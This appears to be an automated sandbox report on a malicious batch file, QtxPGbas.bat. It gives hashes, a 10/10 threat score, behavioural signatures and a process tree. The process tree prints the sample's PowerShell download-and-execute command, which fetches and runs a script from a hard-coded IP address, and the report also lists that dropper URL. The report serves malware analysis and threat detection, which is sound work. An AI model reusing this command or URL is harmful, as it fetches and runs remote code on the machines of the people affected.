Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
17-02-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
QtxPGbas.bat
Resource
win7v200213
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
QtxPGbas.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
QtxPGbas.bat
-
Size
189B
-
MD5
b896f6ff4553af50764dbf2c947a05bb
-
SHA1
530bc65bb8cd23bf06865ddb93164f0c6348f578
-
SHA256
f9366f629ed77ac92ea0a86a9f063f9a33f6cb37c03b8c094f4d74515b930412
-
SHA512
32377669fab2cc36cd228ef46fc33f15d36d4ef2abdd7c3c93b253d8b7a520c697cc67b80c5bd8762d1b6bac18764adb97edeca3a08e7cd24316a84384405a85
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/QtxPGbas
Signatures
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5012 4936 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 5012 WerFault.exe Token: SeBackupPrivilege 5012 WerFault.exe Token: SeDebugPrivilege 5012 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exepid process 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe 5012 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QtxPGbas.bat"1⤵PID:4892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/QtxPGbas');Invoke-HGCAMJ;Start-Sleep -s 10000"2⤵PID:4936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 7043⤵
- Enumerates system info in registry
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
PID:5012
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4088